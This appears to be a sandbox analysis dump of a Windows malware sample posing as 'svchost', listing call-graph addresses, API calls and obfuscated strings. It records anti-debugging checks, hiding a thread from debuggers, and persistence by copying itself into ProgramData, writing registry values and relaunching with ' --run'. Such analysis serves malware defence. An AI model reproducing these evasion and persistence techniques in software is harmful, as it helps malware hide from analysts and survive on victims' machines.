9696->9697 9698 412478 9696->9698 9701 4124b0 9697->9701 9708 4124ac 9697->9708 9698->9697 9699 40e542 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9702 40faa9 9699->9702 9700 4124c5 _memset __crtGetStringTypeA_stat 9703 4124fe MultiByteToWideChar 9700->9703 9700->9708 9701->9700 9704 410b93 _malloc 66 API calls 9701->9704 9702->9691 9705 412525 9703->9705 9706 412514 GetStringTypeW 9703->9706 9704->9700 9709 40f127 9705->9709 9706->9705 9708->9699 9710 40f144 9709->9710 9711 40f133 9709->9711 9710->9708 9711->9710 9712 410cbb _free 66 API calls 9711->9712 9712->9710 9715 411183 MultiByteToWideChar 9713->9715 9716 4111e1 9715->9716 9720 4111e8 9715->9720 9717 40e542 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9716->9717 9719 40fac9 9717->9719 9718 411235 MultiByteToWideChar 9721 41132d 9718->9721 9722 41124e LCMapStringW 9718->9722 9719->9684 9723 410b93 _malloc 66 API calls 9720->9723 9727 411201 __crtGetStringTypeA_stat 9720->9727 9725 40f127 __freea 66 API calls 9721->9725 9722->9721 9724 41126d 9722->9724 9723->9727 9726 411277 9724->9726 9730 4112a0 9724->9730 9725->9716 9726->9721 9728 41128b LCMapStringW 9726->9728 9727->9716 9727->9718 9728->9721 9729 4112ef LCMapStringW 9731 411305 WideCharToMultiByte 9729->9731 9732 411327 9729->9732 9733 4112bb __crtGetStringTypeA_stat 9730->9733 9734 410b93 _malloc 66 API calls 9730->9734 9731->9732 9735 40f127 __freea 66 API calls 9732->9735 9733->9721 9733->9729 9734->9733 9735->9721 9737->9675 9739 410b42 9738->9739 9740 410b49 9738->9740 9739->9740 9745 410b67 9739->9745 9741 410b21 __wcsicmp_l 66 API calls 9740->9741 9742 410b4e 9741->9742 9743 410acf __wcsicmp_l 11 API calls 9742->9743 9744 410b58 9743->9744 9744->8949 9745->9744 9746 410b21 __wcsicmp_l 66 API calls 9745->9746 9746->9742 9748 4136e9 EncodePointer 9747->9748 9748->9748 9749 413703 9748->9749 9749->8963 9753 41108f 9750->9753 9752 4110d8 9752->8965 9754 41109b ___BuildCatchObjectHelper 9753->9754 9761 41145f 9754->9761 9760 4110bc ___BuildCatchObjectHelper 9760->9752 9762 4126fb __lock 66 API calls 9761->9762 9763 4110a0 9762->9763 9764 410fa8 DecodePointer DecodePointer 9763->9764 9765 411057 9764->9765 9766 410fd6 9764->9766 9775 4110c5 9765->9775 9766->9765 9778 4133c2 9766->9778 9768 41103a EncodePointer EncodePointer 9768->9765 9769 410fe8 9769->9768 9770 41100c 9769->9770 9785 4127bf 9769->9785 9770->9765 9772 4127bf __realloc_crt 70 API calls 9770->9772 9773 411028 EncodePointer 9770->9773 9774 411022 9772->9774 9773->9768 9774->9765 9774->9773 9811 411468 9775->9811 9779 4133e2 HeapSize 9778->9779 9780 4133cd 9778->9780 9779->9769 9781 410b21 __wcsicmp_l 66 API calls 9780->9781 9782 4133d2 9781->9782 9783 410acf __wcsicmp_l 11 API calls 9782->9783 9784 4133dd 9783->9784 9784->9769 9789 4127c8 9785->9789 9787 412807 9787->9770 9788 4127e8 Sleep 9788->9789 9789->9787 9789->9788 9790 413bc9 9789->9790 9791 413bd4 9790->9791 9792 413bdf 9790->9792 9793 410b93 _malloc 66 API calls 9791->9793 9794 413be7 9792->9794 9805 413bf4 9792->9805 9795 413bdc 9793->9795 9796 410cbb _free 66 API calls 9794->9796 9795->9789 9810 413bef _free 9796->9810 9797 413c2c 9798 4110f1 _malloc DecodePointer 9797->9798 9800 413c32 9798->9800 9799 413bfc HeapReAlloc 9799->9805 9799->9810 9801 410b21 __wcsicmp_l 66 API calls 9800->9801 9801->9810 9802 413c5c 9804 410b21 __wcsicmp_l 66 API calls 9802->9804 9803 4110f1 _malloc DecodePointer 9803->9805 9806 413c61 GetLastError 9804->9806 9805->9797 9805->9799 9805->9802 9805->9803 9807 413c44 9805->9807 9806->9810 9808 410b21 __wcsicmp_l 66 API calls 9807->9808 9809 413c49 GetLastError 9808->9809 9809->9810 9810->9789 9814 412622 LeaveCriticalSection 9811->9814 9813 4110ca 9813->9760 9814->9813 9919 401000 9815->9919 9818 40112a 9820 401134 GetProcAddress 9818->9820 9819 401163 9819->8973 9819->8977 9819->8978 9820->9819 9821 40114b GetCurrentProcess NtQueryInformationProcess 9820->9821 9821->9819 9921 401090 9822->9921 9825 40de84 SetErrorMode 9931 40d440 GetSystemTime 9825->9931 9826 40de55 _wcsrchr 9826->9825 9829 40de6f SetCurrentDirectoryW 9826->9829 9829->9825 9830 40e542 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9831 40de9e GetCommandLineW CommandLineToArgvW 9830->9831 9831->8981 9831->8982 9833 40d81f _memset 9832->9833 9834 40d87e GetModuleFileNameW 9833->9834 9835 40d899 9834->9835 9838 40d8a0 _wcsrchr 9834->9838 9836 40e542 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9835->9836 9837 40de0e 9836->9837 9837->8985 9838->9835 9839 40f501 __NMSG_WRITE 66 API calls 9838->9839 9840 40d932 SHGetFolderPathW 9839->9840 9841 40d964 9840->9841 9842 40d94e 9840->9842 9959 40f5ce 9841->9959 9843 40f643 __NMSG_WRITE 66 API calls 9842->9843 9843->9841 9846 40f5ce __NMSG_WRITE 66 API calls 9847 40d998 CreateDirectoryW 9846->9847 9848 40d9c2 SetFileAttributesW 9847->9848 9849 40d9ae GetLastError 9847->9849 9850 40f5ce __NMSG_WRITE 66 API calls 9848->9850 9849->9835 9849->9848 9851 40d9e7 9850->9851 9852 40f5ce __NMSG_WRITE 66 API calls 9851->9852 9853 40da02 9852->9853 9854 40f5ce __NMSG_WRITE 66 API calls 9853->9854 9855 40da1b CopyFileW 9854->9855 9855->9835 9856 40da3f SetFileAttributesW 9855->9856 9857 40f5ce __NMSG_WRITE 66 API calls 9856->9857 9858 40da66 9857->9858 9859 40f5ce __NMSG_WRITE 66 API calls 9858->9859 9860 40da7f RegCreateKeyExW 9859->9860 9861 40db4b 9860->9861 9862 40dabd RegSetValueExW RegCloseKey 9860->9862 9863 40dc12 9861->9863 9864 40db5a RegCreateKeyExW 9861->9864 9862->9861 9872 40dc29 _wcsrchr 9863->9872 9968 40d6d0 9863->9968 9864->9863 9865 40db84 RegSetValueExW RegCloseKey 9864->9865 9865->9863 9869 40dd85 _memset 9870 40dd99 CreateProcessW 9869->9870 9870->9835 9871 40dde4 CloseHandle CloseHandle 9870->9871 9871->9835 9872->9835 9872->9869 9872->9872 9873 40dd60 CopyFileW SetFileAttributesW 9872->9873 9873->9869 9875 40f485 9874->9875 9876 40f4ee 9874->9876 9878 410b21 __wcsicmp_l 66 API calls 9875->9878 9881 40e007 9875->9881 10002 40f373 9876->10002 9879 40f491 9878->9879 9880 410acf __wcsicmp_l 11 API calls 9879->9880 9880->9881 9881->8989 9881->8990 9883 405b35 9882->9883 9901 405b2e 9882->9901 9884 405b5e GetPEB 9883->9884 9883->9901 9886 405b88 GetPEB 9884->9886 9884->9901 9885 40e542 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9887 405e0c 9885->9887 9888 405bb6 _memset 9886->9888 9886->9901 9887->8985 9889 405bd3 GetCurrentThread GetThreadContext 9888->9889 9890 405bf8 9889->9890 9891 401090 4 API calls 9890->9891 9890->9901 9892 405c3c 9891->9892 10017 40e120 9892->10017 9895 405c5a 9897 405c67 GetModuleHandleA 9895->9897 9898 405cd2 9895->9898 9896 405c4f GetModuleHandleA 9896->9895 9899 405c81 LoadLibraryA 9897->9899 9900 405c92 GetProcAddress GetProcAddress 9897->9900 9898->9901 9904 405d41 OpenMutexA 9898->9904 9909 405d97 9898->9909 9899->9900 9902 405cc9 9900->9902 9903 405cde GetProcAddress GetProcAddress 9900->9903 9901->9885 9902->9898 9902->9903 9903->9898 9905 405d62 CloseHandle 9904->9905 9906 405d76 CreateMutexA 9904->9906 9905->9901 9906->9901 9906->9909 9907 405dd1 9907->9901 9908 405de5 CloseHandle 9907->9908 9908->9901 9909->9907 10022 4058a0 9909->10022 9912 405e4a GetPEB 9911->9912 9918 405e45 9911->9918 9913 405e76 GetPEB 9912->9913 9912->9918 9915 405e9e _memset 9913->9915 9913->9918 9914 40e542 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9916 405f41 9914->9916 9917 405ebb GetCurrentThread GetThreadContext 9915->9917 9916->8985 9917->9918 9918->9914 9920 40100f GetModuleHandleA 9919->9920 9920->9818 9920->9819 9922 401000 9921->9922 9923 4010a0 GetModuleHandleA 9922->9923 9924 4010b3 9923->9924 9925 4010f8 GetModuleFileNameW 9923->9925 9926 4010bd GetProcAddress 9924->9926 9925->9825 9925->9826 9926->9925 9927 4010d4 9926->9927 9928 4010e2 GetCurrentThread 9927->9928 9929 4010da 9927->9929 9930 4010eb NtSetInformationThread 9928->9930 9929->9930 9930->9925 9936 40d140 9931->9936 9933 40d469 9934 40e542 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9933->9934 9935 40d484 9934->9935 9935->9830 9937 40d15f 9936->9937 9944 40d1f0 9937->9944 9939 40d176 9950 40d2f0 9939->9950 9942 40e542 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9943 40d196 9942->9943 9943->9933 9945 40d20c 9944->9945 9949 40d24c 9945->9949 9954 40cd20 9945->9954 9947 40d28d 9948 40cd20 5 API calls 9947->9948 9948->9949 9949->9939 9951 40d350 _memset 9950->9951 9952 40cd20 5 API calls 9951->9952 9953 40d189 9952->9953 9953->9942 9958 40cd4f 9954->9958 9955 40e542 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9956 40d12e 9955->9956 9956->9947 9957 40cf66 9957->9947 9958->9955 9958->9957 9960 40f5e3 9959->9960 9962 40f5dc 9959->9962 9961 410b21 __wcsicmp_l 66 API calls 9960->9961 9967 40f5e8 9961->9967 9962->9960 9965 40f618 9962->9965 9963 410acf __wcsicmp_l 11 API calls 9964 40d97d 9963->9964 9964->9846 9965->9964 9966 410b21 __wcsicmp_l 66 API calls 9965->9966 9966->9967 9967->9963 9974 40d727 _memset 9968->9974 9969 40d73a 9970 40e542 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9969->9970 9971 40d7eb 9970->9971 9971->9872 9972 40d765 SHGetFolderPathW 9972->9974 9974->9969 9974->9972 9975 40f5ce __NMSG_WRITE 66 API calls 9974->9975 9977 40e340 9974->9977 9986 40d490 9974->9986 9975->9974 9984 40e376 _memset _wcschr 9977->9984 9978 40e389 9979 40e542 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9978->9979 9980 40e4a4 9979->9980 9980->9974 9981 40f643 __NMSG_WRITE 66 API calls 9981->9984 9982 40f501 __NMSG_WRITE 66 API calls 9982->9984 9983 40e462 CreateDirectoryW 9983->9984 9985 40e475 GetLastError 9983->9985 9984->9978 9984->9981 9984->9982 9984->9983 9985->9978 9985->9984 9987 40d4e4 9986->9987 9988 40d4ea 9986->9988 9987->9988 9989 40d503 CoInitializeEx 9987->9989 9992 40e542 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9988->9992 9990 40d523 CoCreateInstance 9989->9990 9991 40d519 9989->9991 9993 40d653 CoUninitialize 9990->9993 9995 40d543 9990->9995 9991->9988 9991->9990 9994 40d6be 9992->9994 9993->9988 9994->9974 9995->9993 9996 40d58f GetFileAttributesW 9995->9996 9997 40d59e 9996->9997 10000 40d5b3 _wcsrchr 9996->10000 9998 40f643 __NMSG_WRITE 66 API calls 9997->9998 9998->10000 9999 40d645 9999->9993 10000->9999 10001 40d639 SetFileAttributesW 10000->10001 10001->9999 10003 40e551 _LocaleUpdate::_LocaleUpdate 76 API calls 10002->10003 10004 40f387 10003->10004 10005 40f3b4 10004->10005 10006 40f38e 10004->10006 10007 40f3bc 10005->10007 10015 40f3e3 10005->10015 10008 410b21 __wcsicmp_l 66 API calls 10006->10008 10009 410b21 __wcsicmp_l 66 API calls 10007->10009 10010 40f393 10008->10010 10011 40f3c1 10009->10011 10013 410acf __wcsicmp_l 11 API calls 10010->10013 10014 410acf __wcsicmp_l 11 API calls 10011->10014 10012 410e08 78 API calls __towlower_l 10012->10015 10016 40f39e 10013->10016 10014->10016 10015->10012 10015->10016 10016->9881 10018 40e13b QueryPerformanceCounter GetTickCount 10017->10018 10019 40e12e 10017->10019 10047 40ef09 10018->10047 10019->10018 10020 405c46 10019->10020 10020->9895 10020->9896 10023 4058f2 10022->10023 10024 405914 10022->10024 10025 40e120 68 API calls 10023->10025 10059 40e210 10024->10059 10027 4058f9 10025->10027 10050 40e170 10027->10050 10031 405987 10032 4059c9 WaitForSingleObject 10031->10032 10035 40599a GetLastError 10031->10035 10037 4059e1 10032->10037 10034 405957 10038 405985 10034->10038 10039 405965 DestroyWindow 10034->10039 10035->10032 10041 4059a9 DestroyWindow 10035->10041 10036 405a4d DestroyWindow 10043 405938 10036->10043 10044 405a87 ReleaseMutex 10036->10044 10037->10036 10042 405a01 PeekMessageA 10037->10042 10038->10032 10039->10043 10041->10043 10045 405a19 TranslateMessage DispatchMessageA 10042->10045 10046 405a2f Sleep 10042->10046 10043->9907 10044->10043 10045->10042 10046->10036 10046->10037 10048 410540 __getptd 66 API calls 10047->10048 10049 40ef13 10048->10049 10049->10020 10071 40ef1b 10050->10071 10053 40ef1b _rand 66 API calls 10054 405903 10053->10054 10055 40e1b0 10054->10055 10056 40e1ba 10055->10056 10058 40e1be 10055->10058 10056->10024 10057 40ef1b _rand 66 API calls 10057->10058 10058->10056 10058->10057 10060 40e24b 10059->10060 10068 40592c 10059->10068 10061 40e262 GetModuleHandleW 10060->10061 10062 40e26d GetClassInfoA 10060->10062 10060->10068 10061->10062 10063 40e29b RegisterClassA 10062->10063 10065 40e295 10062->10065 10063->10065 10064 40e301 10066 40e315 10064->10066 10067 40e307 ShowWindow 10064->10067 10065->10064 10070 40e2cb CreateWindowExA 10065->10070 10066->10068 10069 40e31d UnregisterClassA 10066->10069 10067->10068 10068->10031 10068->10034 10068->10043 10069->10068 10070->10064 10072 410540 __getptd 66 API calls 10071->10072 10073 40e17a 10072->10073 10073->10053 10075 41156b ___BuildCatchObjectHelper 10074->10075 10076 4126fb __lock 61 API calls 10075->10076 10077 411572 10076->10077 10079 41159d DecodePointer 10077->10079 10084 41161c 10077->10084 10081 4115b4 DecodePointer 10079->10081 10079->10084 10093 4115c7 10081->10093 10082 411699 ___BuildCatchObjectHelper 10082->9006 10095 41168a 10084->10095 10085 411681 10087 411447 __mtinitlocknum 3 API calls 10085->10087 10088 41168a 10087->10088 10089 411697 10088->10089 10102 412622 LeaveCriticalSection 10088->10102 10089->9006 10090 4115de DecodePointer 10101 410390 EncodePointer 10090->10101 10093->10084 10093->10090 10094 4115ed DecodePointer DecodePointer 10093->10094 10100 410390 EncodePointer 10093->10100 10094->10093 10096 411690 10095->10096 10097 41166a 10095->10097 10103 412622 LeaveCriticalSection 10096->10103 10097->10082 10099 412622 LeaveCriticalSection 10097->10099 10099->10085 10100->10093 10101->10093 10102->10089 10103->10097 10105 41155f _doexit 66 API calls 10104->10105 10106 4116c6 10105->10106 11498 40ef90 11501 40ef80 11498->11501 11500 40ef9d ctype 11504 410ea8 11501->11504 11503 40ef8e 11503->11500 11505 410eb4 ___BuildCatchObjectHelper 11504->11505 11506 4126fb __lock 66 API calls 11505->11506 11507 410ebb 11506->11507 11509 410eeb 11507->11509 11512 410cbb _free 66 API calls 11507->11512 11513 410ef4 11507->11513 11511 410cbb _free 66 API calls 11509->11511 11510 410f05 ___BuildCatchObjectHelper 11510->11503 11511->11513 11512->11509 11514 410f0f 11513->11514 11517 412622 LeaveCriticalSection 11514->11517 11516 410f16 11516->11510 11517->11516 10133 40df97 10134 40dfb0 10133->10134 10135 40de20 13 API calls 10134->10135 10136 40dfb5 GetCommandLineW CommandLineToArgvW 10135->10136 10137 40dfe2 10136->10137 10138 40dfdc 10136->10138 10139 40d7f0 92 API calls 10137->10139 10138->10137 10140 40dfec 10138->10140 10141 40dfe7 10139->10141 10140->10141 10142 40f476 __wcsicoll 78 API calls 10140->10142 10143 40e0b1 LocalFree 10141->10143 10144 40e0bb 10141->10144 10145 40e007 10142->10145 10143->10144 10146 40e04e 10145->10146 10147 40e00e 10145->10147 10149 40f476 __wcsicoll 78 API calls 10146->10149 10148 40e02c 10147->10148 10151 40f476 __wcsicoll 78 API calls 10147->10151 10152 405b10 103 API calls 10148->10152 10150 40e05f 10149->10150 10153 40e0a6 10150->10153 10154 40e066 10150->10154 10151->10148 10152->10141 10156 40d7f0 92 API calls 10153->10156 10155 40e084 10154->10155 10157 40f476 __wcsicoll 78 API calls 10154->10157 10158 405e10 9 API calls 10155->10158 10156->10141 10157->10155 10158->10141

                                      Executed Functions

                                      Function 0040D7F0 Relevance: 54.6, APIs: 27, Strings: 4, Instructions: 394COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 0 40d7f0-40d897 call 4123e0 * 4 GetModuleFileNameW 9 40d8a0-40d8be call 40eedb 0->9 10 40d899-40d89b 0->10 16 40d8c0-40d8c2 9->16 17 40d8c7-40d8f4 call 40eedb 9->17 11 40de04-40de11 call 40e542 10->11 16->11 20 40d904-40d906 17->20 21 40d8f6-40d902 17->21 20->11 21->20 22 40d90b-40d94c call 40f501 SHGetFolderPathW 21->22 25 40d967-40d9ac call 40f5ce * 2 CreateDirectoryW 22->25 26 40d94e-40d964 call 40f643 22->26 33 40d9c2-40da36 SetFileAttributesW call 40f5ce * 3 CopyFileW 25->33 34 40d9ae-40d9b9 GetLastError 25->34 26->25 42 40da38-40da3a 33->42 43 40da3f-40dab7 SetFileAttributesW call 40f5ce * 2 RegCreateKeyExW 33->43 34->33 36 40d9bb-40d9bd 34->36 36->11 42->11 48 40db4b-40db54 43->48 49 40dabd-40dad2 43->49 50 40dc12-40dc1b 48->50 51 40db5a-40db7e RegCreateKeyExW 48->51 52 40dad8-40daf7 49->52 54 40dc32-40dc3b 50->54 55 40dc1d-40dc2c call 40d6d0 50->55 51->50 53 40db84-40db99 51->53 52->52 56 40daf9-40db45 RegSetValueExW RegCloseKey 52->56 57 40db9f-40dbbe 53->57 59 40dc44-40dc62 call 40eedb 54->59 60 40dc3d-40dc3f 54->60 55->54 56->48 57->57 61 40dbc0-40dc0c RegSetValueExW RegCloseKey 57->61 65 40dd85-40dde2 call 4123e0 CreateProcessW 59->65 66 40dc68-40dc86 call 40eedb 59->66 60->11 61->50 72 40de02 65->72 73 40dde4-40de00 CloseHandle * 2 65->73 66->65 71 40dc8c-40dca8 66->71 74 40dcae-40dcf4 71->74 72->11 73->11 74->74 75 40dcf6-40dd12 74->75 76 40dd18-40dd5e 75->76 76->76 77 40dd60-40dd7f CopyFileW SetFileAttributesW 76->77 77->65
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: _memset$FileModuleName_wcsrchr
                                      • String ID: " --run$.exe$C:\ProgramData$D
                                      • API String ID: 4110263760-856358560
                                      • Opcode ID: 950a9b0d5e19babd959c84d076f819a4769d06f360780ed7d77a3cdf4963b18b
                                      • Instruction ID: 5e5d0b140630b177179d526cbad5a59638b82476de5506c4c87b912bd79cfa18
                                      • Opcode Fuzzy Hash: 950a9b0d5e19babd959c84d076f819a4769d06f360780ed7d77a3cdf4963b18b
                                      • Instruction Fuzzy Hash: 80F15271E443189BDB20DF60CC45BEAB774AF49704F0081E9E20DB6681EBB55AD8CF5A
                                      Function 0040DEB0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 158COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 78 40deb0-40def2 IsDebuggerPresent 79 40def4-40df05 78->79 80 40df0a-40df14 call 401100 78->80 81 40e108-40e119 79->81 84 40df16-40df27 80->84 85 40df2c-40df43 80->85 84->81 86 40dfb0-40dfda call 40de20 GetCommandLineW CommandLineToArgvW 85->86 87 40df45-40df61 GetPEB 85->87 92 40dfe2 call 40d7f0 86->92 93 40dfdc-40dfe0 86->93 88 40df63-40df74 87->88 89 40df79-40df92 87->89 88->81 89->81 96 40dfe7 92->96 93->92 95 40dfec-40dff0 93->95 97 40dff6-40e00c call 40f476 95->97 98 40e0ab-40e0af 95->98 96->98 103 40e04e-40e064 call 40f476 97->103 104 40e00e-40e019 97->104 100 40e0b1-40e0b5 LocalFree 98->100 101 40e0bb-40e0d3 98->101 100->101 101->81 111 40e0a6 call 40d7f0 103->111 112 40e066-40e071 103->112 105 40e01b-40e031 call 40f476 104->105 106 40e03c-40e04c call 405b10 104->106 105->106 118 40e033-40e039 105->118 106->98 111->98 115 40e073-40e089 call 40f476 112->115 116 40e094-40e0a4 call 405e10 112->116 115->116 123 40e08b-40e091 115->123 116->98 118->106 123->116
                                      APIs
                                      • IsDebuggerPresent.KERNEL32(C3108867), ref: 0040DEEA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: DebuggerPresent
                                      • String ID: --check$--config$--run
                                      • API String ID: 1347740429-1715824448
                                      • Opcode ID: 4998038e9da7e4c649bf71f5e2e5df3312fbbd31ea5429612011932821bd840d
                                      • Instruction ID: a6e4f3225be8be52f133a3bd3a6e0bcae41296a009743188dca9600d065854ff
                                      • Opcode Fuzzy Hash: 4998038e9da7e4c649bf71f5e2e5df3312fbbd31ea5429612011932821bd840d
                                      • Instruction Fuzzy Hash: D4518871D04218DBDB24CFA6D844BEEBBB4BB08314F14862AE811B73C0D37D9905CBA9
                                      Function 00401100 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40librarynativeloaderCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 124 401100-401128 call 401000 GetModuleHandleA 127 40112a-401149 call 401000 GetProcAddress 124->127 128 40116d 124->128 127->128 132 40114b-401161 GetCurrentProcess NtQueryInformationProcess 127->132 130 40116f-401172 128->130 132->128 133 401163-401167 132->133 133->128 134 401169-40116b 133->134 134->130
                                      APIs
                                      • GetModuleHandleA.KERNEL32(00000000), ref: 0040111B
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040113C
                                      • GetCurrentProcess.KERNEL32(00000007,00000000,00000004,00000000), ref: 00401155
                                      • NtQueryInformationProcess.NTDLL(00000000), ref: 0040115C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: Process$AddressCurrentHandleInformationModuleProcQuery
                                      • String ID: 7=-55V-55$v=y>.;Bq7/8;6*=287x;8,.<<
                                      • API String ID: 2292878059-3301033669
                                      • Opcode ID: 1c86e47dd1fd906bbdcf03037e39a74239d4cfa1ab3ab8fc813cf9e7548c363e
                                      • Instruction ID: a6687a9151404b893926094712e7bd645b6c75322a1efd05145472f72e85e0e4
                                      • Opcode Fuzzy Hash: 1c86e47dd1fd906bbdcf03037e39a74239d4cfa1ab3ab8fc813cf9e7548c363e
                                      • Instruction Fuzzy Hash: 6101ADB0E40208BBDF10AFF0AC0DBDE7B789B08709F104176E611B62E1D2795A44DB2A
                                      Function 00401090 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 37threadlibrarynativeCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 135 401090-4010b1 call 401000 GetModuleHandleA 138 4010b3-4010d2 call 401000 GetProcAddress 135->138 139 4010f8-4010fb 135->139 138->139 142 4010d4-4010d8 138->142 143 4010e2-4010e8 GetCurrentThread 142->143 144 4010da-4010e0 142->144 145 4010eb-4010f5 NtSetInformationThread 143->145 144->145 145->139
                                      APIs
                                      • GetModuleHandleA.KERNEL32(00000000), ref: 004010A4
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004010C5
                                      • GetCurrentThread.KERNEL32 ref: 004010E2
                                      • NtSetInformationThread.NTDLL(?,00000011,00000000,00000000), ref: 004010F5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: Thread$AddressCurrentHandleInformationModuleProc
                                      • String ID: 7=-55V-55$v={.=q7/8;6*=287|1;.*-
                                      • API String ID: 119525482-1927140540
                                      • Opcode ID: 2435a75c996f34b6889767234aba8995ae01aaa7964b36a464df7492c5cc838d
                                      • Instruction ID: 0b82ffc8d0ca1f8d0bdf6dd75ae4657ab6c6ae2d9d09e3d18241b6bc1c87c415
                                      • Opcode Fuzzy Hash: 2435a75c996f34b6889767234aba8995ae01aaa7964b36a464df7492c5cc838d
                                      • Instruction Fuzzy Hash: 69016DB4D40308BBDB10AFA0DC4A7DE7B74AB08706F10C07AA945626D1D6785A84DB5A
                                      Function 0040DE20 Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00401090: GetModuleHandleA.KERNEL32(00000000), ref: 004010A4
                                        • Part of subcall function 00401090: GetProcAddress.KERNEL32(00000000,00000000), ref: 004010C5
                                        • Part of subcall function 00401090: NtSetInformationThread.NTDLL(?,00000011,00000000,00000000), ref: 004010F5
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000200), ref: 0040DE4B
                                      • _wcsrchr.LIBCMT ref: 0040DE5E
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0040DE7E
                                      • SetErrorMode.KERNELBASE(00008003), ref: 0040DE89
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: Module$AddressCurrentDirectoryErrorFileHandleInformationModeNameProcThread_wcsrchr
                                      • String ID:
